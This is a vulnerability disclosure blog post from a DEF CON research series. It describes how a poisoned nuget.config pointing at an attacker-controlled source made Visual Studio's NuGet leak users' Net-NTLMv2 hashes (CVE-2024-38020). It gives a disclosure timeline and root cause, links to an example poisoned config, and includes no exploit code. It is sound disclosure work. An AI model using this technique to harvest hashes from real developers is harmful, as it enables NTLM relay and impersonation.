Disclosure timeline: 17 April 2024: Reported to the MSRC 18 April 2024: Case opened by the MSRC 27 April 2024: Further reproduction steps provided, including the above PowerShell script 30 April 2024: MSRC confirms that they are able to reproduce 17 May 2024: MSRC confirms that this vulnerability is classed as Important and will be sent for immediate servicing 18 May 2024: MSRC downgrades this issue to a Moderate. 09 July 2024: Patched as part of Patch Tuesday, CVE-2024-38020 assigned.
tl;dr
Earlier versions of Nuget Package Manager shipping with Visual Studio on Windows would leak a Net-NTLMv2 hash on port 80. This would happen on the Nuget Restore operation, which happens as soon as the project is cloned from a Git repo, or otherwise loaded. By poisoning a `nuget.config` file with an IP address of an attacker-controlled upstream repository, it would be possible to coerce or obtain the hashes of anyone cloning the repository. Introduction This is part one of a five-part blog post series focusing on NTLM-related research that was presented by two of our consultants, Tomais Williamson and Jim Rush, as part of the DEF CON 32 presentation (NTLM - the last ride) . After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun forcing authentication and hashes out of a few more things before it fades into obscurity over the next twenty-five years or so. So, what is NTLM? NTLM stands for New Technology Lan Manager, and is the broad name given to the suite of protocols that have underpinned authentication within the Windows ecosystem for the last 30 or so years. In the context of this research, it’s a password hash; a hash being the result of turning a cleartext password (Winter2024!) into a mangled version of itself for transmission over a network, to avoid sending the cleartext password. While it is possible to brute-force weak passwords against known wordlists, the act of hashing a clear text string is like turning a cow into sausages – computationally expensive to get the cow back. However, in an internal Active Directory network, being able to coerce a password hash allows for a variety of relay attacks which do not involve cracking the password. These attacks can allow for user impersonation within an environment. While there are mitigations and steps administrators can take to help reduce this risk, NTLM relaying still presents an excellent way for a malicious actor to laterally move or otherwise pivot around a network. TrustedSec have a great and comprehensive blog post about the relaying attacks available: https://trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022 Now that we understand what an NTLM hash (or Net-NTLMV2) is, and how useful it can be to coerce them, let’s see what we can get them out of. Nuget Package Manager Nuget Package Manager (pronounced "New Get") is a package manager primarily used for packaging and distributing software written using .NET and the .NET Framework. Software packages are self-explanatory, reusable libraries of code that perform certain functions that developers can import into their own projects to save writing their own. How Nuget Stores Credentials As you can imagine, Nuget has some clear documentation surrounding secure storage of credentials. The credentials are recommended to be stored or encrypted and set using the `packageSourceCredentials` node in the `nuget.config` file. Passwords are encrypted by default and are intended to be specified on a per-repository basis, either directly from the command line or using environment variables. The documentation suggests that if a `packageSourceCredentials` node is not set or otherwise populated, Nuget should not pass credentials of any form to an upstream Nuget repository. However, it does, as we discovered. Getting a hash out of Nuget: We reported the below to the MSRC (Microsoft Security Research Centre) who deal with MS related vulnerabilities:
Despite all those technical words for the benefit of the MSRC, the bug is somewhat straightforward:
How this bug happened: ICredentials While trying to figure out the root cause for MS of why Nuget was leaking credentials, we quickly came across the ICredentials interface. This interface within .NET "provides the base authentication interface for retrieving credentials for Web client authentication". This interface provides the `GetCredential` method to objects that provide network credentials to applications and is used extensively throughout the Nuget codebase to handle authentication. Within Nuget, there was a logic error that caused the package manager to retry a request after a 401 response, with the subsequent fallback to the Net-NTLM-v2 hash of the current user being passed in the second attempt. Example `nuget.config` file The below is an example of a poisoned `nuget.config` file, which can be used to coerce the hashes of anyone cloning the repository in VS on Windows:
To reproduce this issue:
An example repository containing an example poisoned nuget.config file can be found here: https://github.com/JimSRush/NTLM_vanilla/blob/main/nuget.config Hello, could I have 500 of my coworkers' hashes please? Disclosure timeline:
|